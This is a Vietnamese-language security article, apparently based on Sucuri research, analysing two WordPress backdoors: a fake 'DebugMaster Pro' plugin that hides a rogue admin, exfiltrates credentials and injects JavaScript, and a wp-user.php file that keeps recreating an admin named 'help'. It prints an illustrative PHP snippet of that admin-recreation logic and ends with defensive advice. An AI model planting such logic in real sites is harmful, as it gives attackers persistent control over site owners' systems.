Kẻ tấn công đã nâng cao chiến thuật của mình bằng cách triển khai các backdoor WordPress tinh vi, được ngụy trang thành các thành phần hợp pháp của nền tảng này. Mục tiêu là đảm bảo quyền truy cập quản trị liên tục ngay cả khi các mã độc khác đã bị phát hiện và gỡ bỏ.

Chiến thuật Tấn công Kép bằng Backdoor WordPress

Bề ngoài đánh lừa của chúng che giấu các chức năng nguy hiểm: một backdoor WordPress giả mạo plugin, trong khi backdoor còn lại ngụy trang thành một tệp lõi của WordPress.

Chúng cùng nhau tạo thành một hệ thống bền bỉ, mang lại cho tin tặc quyền kiểm soát tuyệt đối đối với các website bị xâm nhập, góp phần vào các cuộc tấn công mạng phức tạp.

Phát hiện Kịch bản Xâm nhập Backdoor WordPress

Trong quá trình dọn dẹp một website bị xâm nhập gần đây, hai tệp độc hại đã được phát hiện—mỗi tệp đều giả dạng mã nguồn WordPress tiêu chuẩn nhưng được thiết kế để thao túng các tài khoản quản trị một cách âm thầm.

Tham khảo chi tiết từ nghiên cứu của Sucuri về cách các backdoor WordPress hoạt động: Hidden WordPress Backdoors Creating Admin Accounts.

Backdoor Giả mạo Plugin: DebugMaster Pro

Thành phần độc hại đầu tiên được tìm thấy tại đường dẫn ./wp-content/plugins/DebugMaster/DebugMaster.php.

Đặc điểm và Chức năng Chính của Backdoor WordPress này

Được quảng bá là “DebugMaster Pro”, nó tự giới thiệu với các siêu dữ liệu plugin đáng tin cậy và các bình luận phát triển thông thường. Tuy nhiên, nội dung thực tế của nó bị mã hóa và đóng gói với các đoạn mã ẩn.

Khi kiểm tra kỹ lưỡng, tệp này chứa mã tạo một người dùng quản trị bí mật với thông tin xác thực được mã hóa cứng (hardcoded credentials). Sau đó, nó ẩn người dùng này bằng cách lọc các truy vấn và tự loại bỏ khỏi danh sách plugin. Đây là một ví dụ điển hình về việc duy trì quyền truy cập backdoor WordPress mà không bị phát hiện.

Cơ chế Che giấu và Truyền dữ liệu

Backdoor phức tạp này, được ngụy trang thành DebugMaster Pro, đã tạo một quản trị viên mới khi kích hoạt và truyền thông tin xác thực đó đến máy chủ điều khiển và chỉ huy (C2) từ xa.

Thông tin xác thực được định dạng thành JSON, mã hóa Base64 và truyền qua một điểm cuối bị làm xáo trộn (obfuscated endpoint), cho phép kẻ tấn công giám sát và thu thập chi tiết đăng nhập mà không gây báo động về an ninh mạng.

Chèn Mã độc JavaScript

Ngoài việc thao túng tài khoản, tệp DebugMaster còn chèn mã JavaScript bên ngoài vào mọi trang của khách truy cập, trừ quản trị viên và các địa chỉ IP được đưa vào danh sách trắng.

Mã JavaScript được chèn có thể phục vụ nhiều mục đích: chuyển hướng lưu lượng truy cập đến các miền độc hại, phân phối nội dung spam hoặc thu thập dữ liệu khách truy cập. Nó cũng thu thập địa chỉ IP của quản trị viên để trinh sát, ghi lại cục bộ hoặc gửi lại cho kẻ tấn công. Đây là một vector mạnh mẽ trong các cuộc tấn công mạng vào WordPress.

Backdoor Tái tạo Người dùng: wp-user.php

Tệp thứ hai, ./wp-user.php, nằm ở thư mục gốc của cài đặt WordPress, xuất hiện đơn giản như một tệp lõi khác.

Nó có thiết kế tinh giản hơn nhiều so với plugin giả mạo nhưng cũng nguy hiểm không kém. Script này liên tục kiểm tra sự hiện diện của một người dùng quản trị cụ thể, là một dấu hiệu của backdoor WordPress.

Nguyên lý Hoạt động và Khả năng Phục hồi

Nếu người dùng tồn tại, tệp sẽ xóa và ngay lập tức tạo lại người dùng đó với mật khẩu đã biết của kẻ tấn công. Nếu người dùng không tồn tại, nó sẽ tạo ra người dùng đó.

Đoạn mã này buộc WordPress tạo một người dùng mới có tên help với vai trò quản trị viên. Nếu người dùng đã tồn tại, script đảm bảo rằng người dùng đó có đặc quyền quản trị viên được khôi phục.

// Example snippet of logic, actual code would be obfuscated
if (!username_exists('help')) {
    $user_id = wp_create_user('help', 'attacker_password', '[email protected]');
    if ($user_id && !is_wp_error($user_id)) {
        $user = new WP_User($user_id);
        $user->set_role('administrator');
    }
} else {
    $user = get_user_by('login', 'help');
    if ($user) {
        wp_set_password('attacker_password', $user->ID);
        $user->set_role('administrator');
    }
}

Thông qua quá trình tuần hoàn này, mọi nỗ lực xóa hoặc sửa đổi tài khoản đều bị đảo ngược ngay lập tức. Ngay cả khi chủ sở hữu website nhận thấy các tài khoản đáng ngờ và cố gắng xóa hoặc đổi tên chúng, script sẽ khôi phục quyền truy cập của kẻ tấn công trong lần tải trang hoặc sự kiện theo lịch trình tiếp theo, duy trì backdoor WordPress.

Chiến lược Duy trì Quyền Kiểm soát Kép cho Backdoor WordPress

Cả hai tệp độc hại đều có chung mục tiêu: đảm bảo đặc quyền quản trị liên tục cho kẻ xâm nhập, tạo nên một hệ thống an ninh mạng bị tổn hại nghiêm trọng.

Kỹ thuật Ẩn mình và Phục hồi Liên tục

Backdoor được ngụy trang thành DebugMaster Pro là minh chứng cho cách các đối tượng đe dọa tận dụng kỹ thuật xã hội và làm xáo trộn kỹ thuật. Bằng cách bắt chước một plugin công cụ phát triển hợp pháp, kẻ tấn công giảm bớt sự giám sát từ quản trị viên website, những người có thể bỏ qua một tiện ích bổ trợ có vẻ vô hại.

Mã backdoor WordPress này được ẩn sau nhiều lớp mã hóa Base64, khiến việc phát hiện bằng các máy quét dựa trên chữ ký trở nên khó khăn. Các hook lọc của nó đã loại bỏ mọi dấu vết về sự tồn tại của nó khỏi bảng điều khiển WordPress, trong khi kênh ghi nhật ký từ xa đảm bảo kẻ tấn công nhận được cập nhật theo thời gian thực về các tài khoản quản trị mới.

Đồng thời, script wp-user.php đóng vai trò như một công cụ phục hồi tích cực. Nó đảm bảo việc tạo hoặc tái tạo người dùng quản trị được chỉ định trong mỗi lần thực thi, khiến việc xóa thủ công trở nên vô ích. Cách tiếp cận brute-force này đối với việc duy trì tài khoản có nghĩa là ngay cả một quản trị viên có kỹ năng cũng không thể vượt qua script mà không xác định và xóa tệp độc hại đó trước.

Phương pháp kết hợp này cho phép kẻ tấn công duy trì quyền kiểm soát vĩnh viễn trong website WordPress, trốn tránh các nỗ lực dọn dẹp và duy trì toàn quyền kiểm soát thông qua backdoor WordPress.

Biện pháp Phòng ngừa và Phát hiện Backdoor WordPress

Chủ sở hữu website được khuyến nghị kiểm tra tất cả các thư mục plugin và tệp lõi để tìm các sửa đổi trái phép, bật tính năng giám sát tính toàn vẹn của tệp và thực thi các quy trình xem xét tài khoản quản trị nghiêm ngặt để bảo vệ chống lại các chiến dịch mã độc âm thầm, tinh vi này.

Khuyến nghị An toàn thông tin cho Website

• Thường xuyên cập nhật bản vá bảo mật cho WordPress, plugin và theme để ngăn chặn các cuộc tấn công mạng.
• Sử dụng các công cụ quét mã độc và giám sát tính toàn vẹn tệp (File Integrity Monitoring – FIM) để phát hiện sớm các thay đổi bất thường.
• Thiết lập xác thực đa yếu tố (MFA) cho tất cả tài khoản quản trị.
• Xem xét định kỳ danh sách người dùng quản trị và xóa bất kỳ tài khoản nào không rõ hoặc không cần thiết.
• Hạn chế quyền truy cập vào các tệp lõi của WordPress và các thư mục quan trọng để tăng cường an ninh mạng.